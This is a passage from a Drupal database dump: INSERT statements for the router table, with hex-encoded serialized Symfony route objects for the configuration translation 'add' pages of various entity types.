47572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35353a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.add.entity.block_content_type.edit_form.bc', '/admin/structure/block/block-content/manage/{block_content_type}/translate/{langcode}/add', '/admin/structure/block/block-content/manage/%/translate/%/add', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38393a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a393a22706c7567696e5f6964223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131373a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36313a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.add.entity.captcha_point.edit_form', '/admin/config/people/captcha/captcha-points/{captcha_point}/translate/{langcode}/add', '/admin/config/people/captcha/captcha-points/%/translate/%/add', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38343a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e74732f7b636170746368615f706f696e747d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31333a22636170746368615f706f696e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31333a22636170746368615f706f696e74223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a636170746368615f706f696e74223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a22636170746368615f706f696e74223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131323a227b5e2f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368615c2d706f696e74732f283f503c636170746368615f706f696e743e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a22636170746368615f706f696e74223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e7473223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a22636170746368615f706f696e74223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36313a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e74732f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a393b7d7d, 9);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('config_translation.item.add.entity.comment_type.edit_form', '/admin/structure/comment/manage/{comment_type}/translate/{langcode}/add', '/admin/structure/comment/manage/%/translate/%/add', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31323a22636f6d6d656e745f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6d6d656e745f74797065223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6d6d656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39383a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f283f503c636f6d6d656e745f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6d6d656e745f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34393a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.add.entity.configurable_language.edit_form', '/admin/config/regional/language/edit/{configurable_language}/translate/{langcode}/add', '/admin/config/regional/language/edit/%/translate/%/add', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38353a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f656469742f7b636f6e666967757261626c655f6c616e67756167657d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a32313a22636f6e666967757261626c655f6c616e6775616765223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a32313a22636f6e666967757261626c655f6c616e6775616765223b613a323a7b733a343a2274797065223b733a32383a22656e746974793a636f6e666967757261626c655f6c616e6775616765223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a32313a22636f6e666967757261626c655f6c616e6775616765223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131323a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f656469742f283f503c636f6e666967757261626c655f6c616e67756167653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a32313a22636f6e666967757261626c655f6c616e6775616765223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f65646974223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a32313a22636f6e666967757261626c655f6c616e6775616765223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35343a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f656469742f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.add.entity.contact_form.edit_form', '/admin/structure/contact/manage/{contact_form}/translate/{langcode}/add', '/admin/structure/contact/manage/%/translate/%/add', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31323a22636f6e746163745f666f726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6e746163745f666f726d223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6e746163745f666f726d223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39383a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34393a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.add.entity.date_format.edit_form', '/admin/config/regional/date-time/formats/manage/{date_format}/translate/{langcode}/add', '/admin/config/regional/date-time/formats/manage/%/translate/%/add', 1013, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38363a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f7b646174655f666f726d61747d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31313a22646174655f666f726d6174223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31313a22646174655f666f726d6174223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a646174655f666f726d6174223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a22646174655f666f726d6174223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131343a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f646174655c2d74696d652f666f726d6174732f6d616e6167652f283f503c646174655f666f726d61743e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22646174655f666f726d6174223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34373a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a22646174655f666f726d6174223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313031333b733a31343a227061747465726e4f75746c696e65223b733a36353a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.add.entity.entity_form_mode.edit_form', '/admin/structure/display-modes/form/manage/{entity_form_mode}/translate/{langcode}/add', '/admin/structure/display-modes/form/manage/%/translate/%/add', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38363a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e6167652f7b656e746974795f666f726d5f6d6f64657d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31363a22656e746974795f666f726d5f6d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22656e746974795f666f726d5f6d6f6465223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a656e746974795f666f726d5f6d6f6465223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31363a22656e746974795f666f726d5f6d6f6465223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131343a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f666f726d2f6d616e6167652f283f503c656e746974795f666f726d5f6d6f64653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22656e746974795f666f726d5f6d6f6465223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31363a22656e746974795f666f726d5f6d6f6465223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36303a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.add.entity.entity_view_mode.edit_form', '/admin/structure/display-modes/view/manage/{entity_view_mode}/translate/{langcode}/add', '/admin/structure/display-modes/view/manage/%/translate/%/add', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38363a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e6167652f7b656e746974795f766965775f6d6f64657d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31363a22656e746974795f766965775f6d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22656e746974795f766965775f6d6f6465223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a656e746974795f766965775f6d6f6465223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31363a22656e746974795f766965775f6d6f6465223b693a313b733a383a